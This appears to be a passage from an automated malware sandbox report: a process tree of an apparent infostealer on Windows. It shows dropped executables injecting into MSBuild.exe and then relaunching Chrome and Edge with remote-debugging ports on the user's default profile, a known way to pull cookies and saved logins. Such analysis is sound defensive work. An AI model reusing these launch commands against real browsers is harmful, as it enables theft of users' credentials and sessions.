C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdfd63dcf8,0x7ffdfd63dd04,0x7ffdfd63dd108⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1996,i,1311576472261775597,18337393281237229038,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1992 /prefetch:28⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1556,i,1311576472261775597,18337393281237229038,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2244 /prefetch:38⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2356,i,1311576472261775597,18337393281237229038,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2504 /prefetch:88⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,1311576472261775597,18337393281237229038,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3224 /prefetch:18⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3248,i,1311576472261775597,18337393281237229038,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3284 /prefetch:18⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,1311576472261775597,18337393281237229038,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3792 /prefetch:28⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4592,i,1311576472261775597,18337393281237229038,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4556 /prefetch:18⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5156,i,1311576472261775597,18337393281237229038,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5152 /prefetch:88⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5460,i,1311576472261775597,18337393281237229038,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5472 /prefetch:88⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5208,i,1311576472261775597,18337393281237229038,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5272 /prefetch:88⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdfd63dcf8,0x7ffdfd63dd04,0x7ffdfd63dd108⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1944,i,11611899442787976690,9573393665396920283,262144 --variations-seed-version --mojo-platform-channel-handle=2448 /prefetch:38⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2416,i,11611899442787976690,9573393665396920283,262144 --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:28⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2044,i,11611899442787976690,9573393665396920283,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:88⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,11611899442787976690,9573393665396920283,262144 --variations-seed-version --mojo-platform-channel-handle=3168 /prefetch:18⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,11611899442787976690,9573393665396920283,262144 --variations-seed-version --mojo-platform-channel-handle=3224 /prefetch:18⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4040,i,11611899442787976690,9573393665396920283,262144 --variations-seed-version --mojo-platform-channel-handle=3992 /prefetch:28⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4232,i,11611899442787976690,9573393665396920283,262144 --variations-seed-version --mojo-platform-channel-handle=4248 /prefetch:18⤵
- Uses browser remote debugging
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdfd63dcf8,0x7ffdfd63dd04,0x7ffdfd63dd108⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1996,i,8746026014395974460,10407147486725794408,262144 --variations-seed-version --mojo-platform-channel-handle=1992 /prefetch:28⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2144,i,8746026014395974460,10407147486725794408,262144 --variations-seed-version --mojo-platform-channel-handle=2240 /prefetch:38⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2364,i,8746026014395974460,10407147486725794408,262144 --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:88⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3248,i,8746026014395974460,10407147486725794408,262144 --variations-seed-version --mojo-platform-channel-handle=3260 /prefetch:18⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,8746026014395974460,10407147486725794408,262144 --variations-seed-version --mojo-platform-channel-handle=3296 /prefetch:18⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,8746026014395974460,10407147486725794408,262144 --variations-seed-version --mojo-platform-channel-handle=4296 /prefetch:28⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,8746026014395974460,10407147486725794408,262144 --variations-seed-version --mojo-platform-channel-handle=4684 /prefetch:18⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4908,i,8746026014395974460,10407147486725794408,262144 --variations-seed-version --mojo-platform-channel-handle=4816 /prefetch:88⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5392,i,8746026014395974460,10407147486725794408,262144 --variations-seed-version --mojo-platform-channel-handle=5476 /prefetch:88⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4640,i,8746026014395974460,10407147486725794408,262144 --variations-seed-version --mojo-platform-channel-handle=5568 /prefetch:88⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5724,i,8746026014395974460,10407147486725794408,262144 --variations-seed-version --mojo-platform-channel-handle=4936 /prefetch:88⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5856,i,8746026014395974460,10407147486725794408,262144 --variations-seed-version --mojo-platform-channel-handle=5868 /prefetch:88⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6040,i,8746026014395974460,10407147486725794408,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:88⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x250,0x7ffdfd8cf208,0x7ffdfd8cf214,0x7ffdfd8cf2208⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1812,i,7882975645130664135,17309389875927467390,262144 --variations-seed-version --mojo-platform-channel-handle=2072 /prefetch:38⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2016,i,7882975645130664135,17309389875927467390,262144 --variations-seed-version --mojo-platform-channel-handle=2012 /prefetch:28⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2496,i,7882975645130664135,17309389875927467390,262144 --variations-seed-version --mojo-platform-channel-handle=2664 /prefetch:88⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3492,i,7882975645130664135,17309389875927467390,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:18⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3500,i,7882975645130664135,17309389875927467390,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:18⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4172,i,7882975645130664135,17309389875927467390,262144 --variations-seed-version --mojo-platform-channel-handle=4604 /prefetch:18⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4188,i,7882975645130664135,17309389875927467390,262144 --variations-seed-version --mojo-platform-channel-handle=4616 /prefetch:28⤵
- Uses browser remote debugging
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5148,i,7882975645130664135,17309389875927467390,262144 --variations-seed-version --mojo-platform-channel-handle=3668 /prefetch:88⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5296,i,7882975645130664135,17309389875927467390,262144 --variations-seed-version --mojo-platform-channel-handle=5308 /prefetch:88⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4964,i,7882975645130664135,17309389875927467390,262144 --variations-seed-version --mojo-platform-channel-handle=5492 /prefetch:88⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5576,i,7882975645130664135,17309389875927467390,262144 --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:88⤵
-
-
-
C:\ProgramData\f3oppzctje.exe"C:\ProgramData\f3oppzctje.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
-
-
-
C:\ProgramData\iwlf3oph4o.exe"C:\ProgramData\iwlf3oph4o.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""9⤵
- Uses browser remote debugging
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe0cfddcf8,0x7ffe0cfddd04,0x7ffe0cfddd1010⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1992,i,13184430344842895757,13474166043140542124,262144 --variations-seed-version --mojo-platform-channel-handle=1984 /prefetch:210⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,13184430344842895757,13474166043140542124,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:310⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,13184430344842895757,13474166043140542124,262144 --variations-seed-version --mojo-platform-channel-handle=2380 /prefetch:810⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3224,i,13184430344842895757,13474166043140542124,262144 --variations-seed-version --mojo-platform-channel-handle=3184 /prefetch:110⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3248,i,13184430344842895757,13474166043140542124,262144 --variations-seed-version --mojo-platform-channel-handle=3356 /prefetch:110⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4284,i,13184430344842895757,13474166043140542124,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:210⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4544,i,13184430344842895757,13474166043140542124,262144 --variations-seed-version --mojo-platform-channel-handle=4436 /prefetch:110⤵
- Uses browser remote debugging
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4956,i,13184430344842895757,13474166043140542124,262144 --variations-seed-version --mojo-platform-channel-handle=4968 /prefetch:810⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5384,i,13184430344842895757,13474166043140542124,262144 --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:810⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""9⤵
- Uses browser remote debugging
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch10⤵
- Uses browser remote debugging
-
